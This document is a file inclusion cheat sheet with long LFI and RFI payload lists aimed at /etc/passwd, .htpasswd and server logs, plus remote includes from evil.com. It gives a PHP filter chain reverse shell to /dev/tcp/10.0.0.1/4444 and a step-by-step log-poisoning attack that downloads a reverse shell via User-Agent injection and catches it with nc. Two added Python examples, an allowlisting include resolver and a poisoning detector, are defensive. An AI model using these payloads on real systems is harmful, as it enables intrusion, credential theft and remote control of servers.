File Inclusion
Last modified: 2023-03-14
Local File Inclusion (LFI) and Remote File Inclusion (RFI) are vulnerabilities often found in web applications that rely on a scripting runtime and build include paths from user input.
Local File Inclusion (LFI)
?page=../
?page=/etc/passwd
?page=../../../../etc/passwd
?page=../../../../../etc/passwd
?page=..//..//..//..//..//etc/passwd
?page=....//....//....//....//etc/passwd
?page=....//....//....//....//....//....//etc/passwd
?page=../../../../../../../../../../../../../../etc/passwd
?page=..\/..\/..\/..\/etc/passwd
?page=..%2F..%2F..%2F..%2Fetc/passwd
?page=..%5C..%5C..%5C..%5cetc/passwd
?page=..%252f..%252f..%252f..%252fetc/passwd
?page=/etc/passwd&
?page=/etc/passwd%00
?page=/etc/passwd%00.inc
?page=/etc/passwd%00.php
?page=http://localhost/index
?page=http:%5c%5cindex
?page=http:%252f%252findex
?page=somedir/../../../../etc/passwd&ext=
# File scheme
?page=file:///etc/passwd
?page=file:%2F%2F%2Fetc%2Fpasswd
?page=file:%252F%252F%252Fetc%252Fpasswd
?page=file%3A///etc/passwd
?page=file%2A%2F%2F%2Fetc%2Fpasswd
?page=file%2A%252F%252F%252Fetc%252Fpasswd
?page=file://var/www/html/index.php
?page=file://var/www/<subdomain>/index.php
# Host
?page=/etc/hosts
# Cron
?page=/etc/crontab
# Apache
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/.htpasswd
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log
# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf
# PHP Filter
?page=php://filter/resource=/etc/passwd
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://filter/convert.base64-encode/resource=index.php
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
# Windows
?page=../../../../../../../../windows/system32/drivers/etc/hosts
Remote File Inclusion (RFI)
?page=//evil.com/exploit
?page=%2F%2fevil.com/exploit
?page=%2C%2Cevil.com/exploit
?page=http://evil.com/exploit
?page=http%3A//evil.com/exploit
?page=http%3A%2F%2Fevil%2Ecom/exploit
?page=http%253A%252F%252Fevil%252Ecom/
?page=test@sub.example.com/
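The lists above show how many encodings one `?page=` parameter can arrive in. The defensive counterpart, added here as an example and not part of the original cheat sheet, is a resolver that first canonicalises the value the way a permissive runtime would (repeated URL-decoding, backslash to slash, NUL detection) and then accepts only an exact allowlisted template name that resolves inside a fixed base directory. It is written in Python rather than the PHP such applications usually run on; `ALLOWED_PAGES`, the `.php` suffix and the directory layout are assumptions made for the example.

```python
"""Hardened counterpart to a user-controlled ``?page=`` include.

Added example, not code from the original page. Every refusal reason maps to
one family of payloads from the LFI/RFI lists above.
"""
import os
import re
import tempfile
from urllib.parse import unquote

# Assumption for the example: the only templates the application may include.
ALLOWED_PAGES = {"home", "about", "contact"}

# Anything shaped like a URL scheme or PHP stream wrapper: php:, file:, data:, http:, ...
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)


def canonicalize(value, max_rounds=3):
    """Undo stacked encodings (%2F, %252F, %5C) so the checks see what the runtime would."""
    decoded = value
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/")


def classify(value):
    """Return "ok" or the reason a ?page= value is refused."""
    decoded = canonicalize(value)
    if "\x00" in decoded:
        return "null-byte"            # /etc/passwd%00.php style truncation
    if decoded.startswith("//") or SCHEME_RE.match(decoded):
        return "scheme-or-wrapper"    # php://filter, file:, data:, http:, //host
    if ".." in decoded.split("/"):
        return "traversal"            # ../, ..%2F, ..%5C, ..%252f, ..\/
    if "/" in decoded:
        return "path-separator"       # absolute paths, ....//, host/exploit
    if decoded not in ALLOWED_PAGES:
        return "not-allowlisted"
    return "ok"


def resolve_include(base_dir, value):
    """Map an accepted page name to a file under base_dir, or None.

    The realpath containment check is defence in depth (symlinks inside
    base_dir); classify() already rejects every encoded form above.
    """
    if classify(value) != "ok":
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, canonicalize(value) + ".php"))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def demo_tree():
    """Create a throwaway template directory holding home.php (constructed for the demo)."""
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "home.php"), "w") as fh:
        fh.write("<?php echo 'home'; ?>\n")
    return base


if __name__ == "__main__":
    samples = [
        "home",
        "../../../../etc/passwd",
        "..%252f..%252f..%252fetc/passwd",
        "/etc/passwd%00.php",
        "php://filter/convert.base64-encode/resource=index.php",
        "//evil.com/exploit",
        "http%253A%252F%252Fevil%252Ecom/",
    ]
    for s in samples:
        print(f"{s!r:60} -> {classify(s)}")
    base = demo_tree()
    print(resolve_include(base, "home"))
    print(resolve_include(base, "../home"))
```

The allowlist does the real work; the decoding loop exists so that a double-encoded `%252f` or a backslash variant cannot slip past a check that only looks at the raw string. A blocklist of `../` alone would still pass `....//` and the wrapper forms.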
Remote Code Execution (RCE)
php_filter_chain_generator is a CLI tool that generates a payload for PHP filter chain bypass and allows RCE.
Below is the payload for a reverse shell.
wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain "<?php system('bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\"')?>"
Then copy the output and paste it into the target.
Log Poisoning
1. Check if You Can Access the Apache Log File
# Debian, Ubuntu Linux
/?page=/var/log/apache/access.log
/?page=../../../../var/log/apache/access.log
/?page=/var/log/apache2/access.log
/?page=../../../../var/log/apache2/access.log
# FreeBSD Linux
/?page=/var/log/httpd-access.log
/?page=../../../../var/log/httpd-access.log
# CentOS, Fedora, RedHat Linux
/?page=/var/log/httpd/access_log
/?page=../../../../var/log/httpd/access_log
2. Prepare the Payload for PHP Reverse Shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
# Edit the values in the payload
$ip = '<attacker-ip>';
$port = 4444;
3. Open Web Server in Local Machine
python -m http.server 80
4. Inject PHP Payload in the User-Agent
Send a GET request with the payload in the User-Agent header.
The payload writes the reverse shell to /shell.php on the target website.
GET / HTTP/1.1
...
User-Agent: <?php file_put_contents('shell.php', file_get_contents('http://<attacker-ip>/shell.php')); ?>
5. Apply the Injection
Refresh the page /index.php?page=../../../../var/log/apache2/access.log so that the poisoned log entry is included and executed.
6. Open Listener for Reverse Shell
On your local machine, open the listener.
You need to specify the port you set in step 2.
nc -lvnp 4444
7. Gain Access to Shell
Access /shell.php on the target website.
If it goes well, you get a shell.
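From the defender's side, the sequence above leaves two distinct traces in the web server's own access log: a PHP open tag written into a logged field (User-Agent, Referer or the request line), and a later request whose include parameter names a log file. The scanner below, added as an example and not taken from the original page, parses combined-format log lines and reports both stages. The sample lines, addresses and timestamps are constructed for the example.

```python
"""Detect the two stages of access-log poisoning in combined-format logs.

Added example, not from the original page. Sample log lines are constructed.
"""
import re
from urllib.parse import unquote

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# Long, short and echo tags; the bare "<?" also matches "<?xml", tune per site.
PHP_TAG_RE = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)
# Log locations listed in the cheat sheet (Debian, FreeBSD and RHEL families).
LOG_PATH_RE = re.compile(r"/var/log/|access[._]log|error[._]log|httpd-access", re.IGNORECASE)

# Constructed sample: one benign request, one poisoning attempt, two include attempts.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Mar/2023:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Mar/2023:10:00:09 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
    '198.51.100.7 - - [14/Mar/2023:10:00:15 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 9876 "-" "curl/7.88.1"',
    '198.51.100.7 - - [14/Mar/2023:10:00:21 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fvar%2Flog%2Fhttpd%2Faccess_log HTTP/1.1" 404 0 "-" "curl/7.88.1"',
]


def parse_line(line):
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def decode(value, rounds=3):
    """Peel stacked URL-encoding so %3C%3Fphp and %252e%252e are seen as written."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def signals_for(entry):
    """Return the list of poisoning indicators present in one parsed entry."""
    found = []
    # Stage 1: attacker-controlled text containing a PHP tag lands in the log.
    for field in ("ua", "ref", "req"):
        if PHP_TAG_RE.search(decode(entry[field])):
            found.append(f"php-tag-in-{field}")
    # Stage 2: the include parameter points at the log file itself.
    parts = entry["req"].split(" ")
    path = parts[1] if len(parts) >= 2 else ""
    query = path.partition("?")[2]
    if query and LOG_PATH_RE.search(decode(query)):
        found.append("log-file-include")
    return found


def scan(lines):
    """Run every line through the checks and return one alert dict per indicator."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for signal in signals_for(entry):
            alerts.append({"ip": entry["ip"], "time": entry["ts"], "signal": signal, "line": line})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"{alert['time']} {alert['ip']:15} {alert['signal']}")
```

A stage-1 hit followed within minutes by a stage-2 hit from the same address is the strongest signal; a stage-2 hit on its own still shows that the include parameter accepts arbitrary paths and should be handled as an LFI finding regardless of whether the log was writable.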